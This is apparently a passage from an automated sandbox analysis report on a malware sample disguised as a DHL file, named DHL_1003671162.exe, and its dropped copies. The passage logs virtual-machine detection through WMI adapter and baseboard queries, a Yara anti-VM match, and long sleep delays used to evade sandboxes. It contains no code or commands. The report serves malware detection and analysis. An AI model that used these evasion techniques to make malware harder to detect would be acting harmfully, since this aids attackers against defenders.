                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 7924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7656, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 2A00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 4A00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 8A40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 7330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 9A40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: AA40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: B1F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 8A40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 1260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 4B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 8B00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 9B00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 9D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: AD00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: B390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: C390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: D390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeMemory allocated: 4EF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 16D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3420000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 8D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 9D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 9F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: AF10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: B4A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: C4A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: D4A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3230000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 32B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 52B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 2570000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 25F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 45F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 84B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 94B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 96C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: A6C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: AAB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 84B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3160000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6644Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1829Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWindow / User API: threadDelayed 2040Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWindow / User API: threadDelayed 1884Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWindow / User API: threadDelayed 1005Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWindow / User API: threadDelayed 2382Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWindow / User API: threadDelayed 354
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWindow / User API: threadDelayed 2826
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWindow / User API: threadDelayed 846
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWindow / User API: threadDelayed 2536
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7916Thread sleep count: 2040 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99733s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7916Thread sleep count: 1884 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99296s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -99077s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98371s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98141s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -98016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -97904s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -97797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe TID: 7900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 1704Thread sleep count: 1005 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 1704Thread sleep count: 2382 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99450s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99325s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99217s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99108s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -99000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -98890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -98781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -98672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -98562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -98453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -98343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -98234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe TID: 7072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 5476Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7744Thread sleep count: 354 > 30
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7744Thread sleep count: 2826 > 30
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99780s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99436s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -99094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -98984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -98849s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -98734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -98624s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -98516s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -98391s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7640Thread sleep time: -98266s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7212Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7380Thread sleep count: 846 > 30
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7380Thread sleep count: 2536 > 30
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99560s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99339s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99124s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -99015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -98890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -98780s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -98671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -98561s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -98451s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -98338s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -98208s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 8116Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
